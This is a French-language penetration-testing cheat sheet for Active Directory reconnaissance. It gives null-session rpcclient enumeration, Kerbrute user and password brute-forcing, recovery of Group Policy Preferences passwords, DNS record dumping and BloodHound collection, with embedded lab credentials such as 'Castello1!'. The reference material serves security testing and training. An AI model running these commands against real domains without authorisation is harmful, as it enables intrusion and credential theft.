Enumération distante
Enum4Linux
enum4linux-ng <dc_ip>
Récupération des utilisateurs
rpcclient -U "" -N <dc_ip>
rpcclient $> enumdomusers
rpcclient $> enumdomgroups
rpcclient $> enumprinters
rpcclient $> enumprivs
rpcclient $> querydispinfo
rpcclient $> lookupnames <USERNAME>
L’outil Kerbrutre peut être utilisé pour bruteforcer des utilisateurs ou mots de passe.
kerbrute userenum --dc $DC_IP -d $DOMAIN `fzf-wordlists`
La liste xato-net-10-million-usernames-dup.txt
est intéressant pour ce type d’attaque.
L’outil smartebrute
semble très bien fonctionner lui aussi pour cette tache.
Récupération des GPP
Get-GPPPassword -debug -no-pass <DC>
Enumération des entrées DNS
bloodyAD --host "$DC_IP" -d "$DOMAIN" -u "$USER" -p "$PASSWORD" get dnsDump
adidnsdump -u "$DOMAIN"\\"$USER" -p "$PASSWORD" "$DC_IP" -r
Les résultats sont ensuite stockés dans un fichier nommé “records.csv”.
Traitement de la sortie
Les données extraites par adidnsdump
sont au format CSV, il est possible de traiter la sortie pour obtenir uniquement la liste des machines avec le nom de domaine complet:
cut -d "," -f 2 records.csv | grep -v @ | sed 's/$/.$DOMAIN/
Bloodhound
nxc ldap 172.16.155.6 -u "jim" -p 'Castello1!' --bloodhound --collection All
bloodhound.py -c All -d blackfield.local -u 'support' -p '#00^BlackKnight' -dc dc01.blackfield.local -ns 10.10.10.192